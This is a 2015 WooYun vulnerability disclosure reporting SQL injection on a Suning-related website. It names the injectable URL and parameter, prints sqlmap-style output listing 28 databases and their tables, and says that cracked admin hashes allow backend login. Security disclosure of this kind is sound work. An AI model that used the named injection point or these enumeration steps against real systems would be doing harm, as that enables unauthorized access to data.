当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094687

漏洞标题:苏宁某站注入漏洞 可获大量信息(可获管理员密码hash)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: Mr.Q

提交时间:2015-01-30 11:00

修复时间:2015-03-16 11:02

公开时间:2015-03-16 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-30: 细节已通知厂商并且等待厂商处理中
2015-01-30: 厂商已经确认,细节仅向厂商公开
2015-02-09: 细节向核心白帽子及相关领域专家公开
2015-02-19: 细节向普通白帽子公开
2015-03-01: 细节向实习白帽子公开
2015-03-16: 细节向公众公开

简要描述:

苏宁某站注入漏洞 可获大量信息(可获管理员密码hash)

详细说明:

苏宁某站注入漏洞 可获大量信息(可获管理员密码hash)
附上注入点 http://www.suning.com.cn/ListPic.aspx?RID=5&BID=7
参数 RID

a.png



available databases [28]:                                                                                      
[*] BMSStore
[*] DB_ShuNin
[*] Dell_CMDB
[*] distribution
[*] Ecardtong
[*] FEPDW_S01
[*] HWATT
[*] iCCard
[*] jbtkq
[*] kaoqing
[*] localGPSDB
[*] MangageLeader3.0gr
[*] master
[*] model
[*] msdb
[*] OATOAMS
[*] PCMDB
[*] PLDM
[*] ReportServer
[*] ReportServerTempDB
[*] snuniversal
[*] suninghuanqiu
[*] tempdb
[*] VAMT
[*] VirtualManagerDB
[*] wx
[*] ZK
[*] zkteco_database


管理员信息 密码md5解密后可登陆后台

b.png


还有大量数据 不一一列举 望尽快修复

Database: suninghuanqiu
[8 tables]
+--------------------------------------------+
| Qwx_Admin |
| Qwx_Column |
| Qwx_Database |
| Qwx_Fail |
| Qwx_Info |
| Qwx_Label |
| Qwx_Online |
| dtproperties |
+--------------------------------------------+
Database: master
[59 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
+--------------------------------------------+
Database: DB_ShuNin
[35 tables]
+--------------------------------------------+
| D99_CMD |
| D99_Tmp |
| Info_Ad |
| Info_Article |
| Info_Gbook |
| Info_Job |
| Info_Link |
| Info_Member |
| Info_Order |
| Info_PhotoList |
| Info_Procure1 |
| Info_Procure1 |
| Info_Product |
| Info_Recruitment |
| Info_Replay |
| Info_Resume |
| Info_SetJob |
| Sys_Channel |
| Sys_Class |
| Sys_Config |
| Sys_LoginUser |
| Sys_Menu |
| View_ArticleClass |
| View_JobClass |
| View_PhotoListClass |
| View_ProcureClass |
| View_SetJobClass |
| djgz_users |
| djgz_users |
| floor |
| news_class |
| news_class |
| product |
| sqlmapoutput |
| zbgg |
+--------------------------------------------+
Database: msdb
[21 tables]
+--------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| suspect_pages |
| sysdac_instances |
| syspolicy_conditions |
| syspolicy_configuration |
| syspolicy_object_sets |
| syspolicy_policies |
| syspolicy_policy_categories |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details |
| syspolicy_system_health_state |
| syspolicy_target_set_levels |
| syspolicy_target_sets |
+--------------------------------------------+

漏洞证明:

已证明

修复方案:

你们更加专业 望尽快修复

版权声明:转载请注明来源 Mr.Q@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-30 17:26

厂商回复:

感谢提交

最新状态:

2015-05-27:suning.com.cn非易购域名,谢谢。